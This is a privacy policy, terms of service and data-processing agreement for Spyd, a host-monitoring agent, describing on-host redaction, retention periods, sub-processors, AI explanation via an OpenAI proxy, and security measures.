Privacy & Terms
Spyd is privacy-first by design: full-fidelity data stays on your host, only a redacted shape leaves it, and nothing leaves until you consent. This page also covers our terms of service and data-processing commitments.
1. Who we are & lawful basis
For data processed through Spyd Cloud, you (the customer operating the monitored hosts) are the data controller and Spyd is the data processor. The legal entity is Spyd Infotech, United States.
Lawful basis: your recorded, versioned consent (shown once at install/enroll) plus legitimate interest in security monitoring of your own infrastructure.
2. What data moves, and where
| Tier | Where it lives | Contents |
|---|---|---|
| Local brain | This host only (brain.db) | Full-fidelity, per-host. Never transmitted. |
| Central brain | Spyd Cloud (api.spyd.sh) | Redacted aggregate that powers fleet learning + the cockpit. |
| AI analysis | Spyd proxy → OpenAI | Redacted incident context for an explanation; no AI key on the host. |
| Notifications | Channels you configure | Full fidelity by your choice; secrets still scrubbed. |
Egress is over HTTPS, signed with this host's Ed25519 key: incident sync (~30s), brain sync (periodic batch), and a 60-second heartbeat (liveness only — no monitoring data).
3. What is redacted before egress
Applied on the host by Spyd's redaction pipeline before anything leaves, and verified by an automated no-leak test:
| Class | Transform |
|---|---|
| Your IPs | Coarsened to /24 (IPv4) / /48 (IPv6); non-IPs dropped. |
| Usernames | Non-reversible per-org HMAC pseudonym (user_<hex>). |
| Command lines | Reduced to the executable family name (no args/paths). |
| Free text | Secret-scrubbed; embedded IPs coarsened. |
External threat indicators (security exception)
When a security detector flags a hostile external source — an attacker IP, a malicious
domain, a mining-pool address — that indicator is preserved verbatim in the synced
incident so "block the source" stays actionable. This never applies to your own data (internal IPs,
usernames, hostnames, secrets remain redacted). Lawful basis: legitimate interest (security evidence).
Set privacy.preserve_threat_indicators: false to coarsen these too (privacy-maximal).
Local-only mode: decline consent (or set sync.mode: local_only) and
nothing egresses — Spyd runs fully on-host with AI off.
4. Retention
| Data | Retention |
|---|---|
| Central incidents / brain | 90 days default (org-configurable), then reaped daily. |
| Local on-host data | storage.retention_days = 30 default. |
| User sessions | 30 days (HttpOnly/Secure/SameSite cookies). |
| Magic-link tokens | 15 minutes, one-time. |
| Enrollment tokens | 24 hours, one-time. |
| Agent identity records | Until host/org deletion. |
| Audit log | Retained for the life of the account (no fixed expiry). |
5. Sub-processors
Third parties that process data on Spyd's behalf to deliver the service. We notify customers by email of additions before a new sub-processor begins processing, with the opportunity to object within 30 days.
| Sub-processor | Purpose | Region |
|---|---|---|
| OpenAI | AI incident explanation (via the Spyd proxy; redacted context only) | United States |
| Resend | Transactional email (magic-link sign-in, invites, notifications) | United States |
| Hetzner | Hosting (Postgres + app) and off-box backups (Object Storage) | Germany / Finland (EU) |
| Let's Encrypt | TLS certificates (ACME via Caddy) | — |
6. AI usage
- Provider & model: explanations are served through Spyd's hosted proxy to
OpenAI (
gpt-4o-mini, configurable server-side); the model is selected by Spyd Cloud. - Keys never on your hosts: the OpenAI key is held only server-side; agents authenticate by their Ed25519 identity. Self-hosters may bring their own key (OpenAI / Anthropic / Ollama) via agent config.
- What is sent: only redacted incident context — redacted on the host before the request leaves. Prompts/responses are not logged or persisted.
- Never a dependency: if the proxy is unavailable, the agent falls back to local rule-based diagnosis; monitoring continues without AI.
- Limits: fleet-wide rate limiting (~5 req/s, burst 30). AI engages only after you accept the disclosure; revoke consent to turn it off.
7. International transfers
AI explanations are processed by OpenAI in the United States; redacted incident context only. Transfers rely on the EU Standard Contractual Clauses (SCCs). Hosting and backups are in the EU (Hetzner, Germany / Finland).
8. Your rights & controls
- Access: the session-protected cockpit lists your incidents, agents, and users.
- Erasure: deleting a host removes the agent and its cloud data; an organization owner can permanently delete the entire org and all its data from Settings → Danger zone in the cockpit.
- Restrict: revoke an agent (stops ingest, keeps record) or disable notifications.
- Local-only: decline or revoke consent to keep everything on-host.
- Portability: a self-service data-export endpoint is not yet available.
9. Terms of service
Spyd is a host-monitoring agent and an optional cloud control plane (Spyd Cloud / Cockpit). These terms are between you and Spyd Infotech ("Spyd").
- Accounts & enrollment: cloud access uses passwordless magic-link sign-in. You are responsible for the hosts you enroll and for your organization's credentials and enrollment tokens.
- Acceptable use: run Spyd only on systems you own or are authorized to monitor. Do not misuse the service to attack, probe, or disrupt third parties.
- Read-only on your hosts: Spyd runs diagnostic probes and never changes your system.
- Warranties & liability: the service is provided "as is", to the extent permitted by law.
- Changes & governing law: we may update these terms without prior notice; when a change is published we notify account owners by email. Governed by the laws of the United States.
10. Data processing (DPA)
Where Spyd processes personal data on your behalf, the customer is the controller and Spyd Infotech is the processor, acting only on the customer's documented instructions for the duration of the subscription. Full-fidelity data remains on the customer's hosts and is not processed by Spyd Cloud.
Technical & organizational measures
- Authenticity: Ed25519 request signing on every agent→cloud call, verified against the host's enrolled public key (the header key is not trusted after enrollment).
- Tenant isolation: Postgres Row-Level Security on all tenant tables; the app runs as a non-superuser with the org scope set per transaction.
- Encryption in transit: TLS everywhere (Let's Encrypt) with HSTS and a per-host content-security policy.
- Data minimization: on-host redaction pipeline, proven by an automated no-leak corpus test; idempotent ingest keyed by a content hash.
- Backups: nightly logical database dumps shipped off-box (EU).
Breach notification: Spyd notifies the controller without undue delay — within 72 hours of becoming aware of a personal-data breach — and makes available the information reasonably needed to demonstrate compliance.
Sub-processors are listed in section 5; transfers rely on the SCCs (section 7).
11. Contact
Privacy, terms, or data-processing questions:
legal@spyd.sh. We bump
disclosure_version and re-prompt hosts for consent on any material change to data movement
or redaction.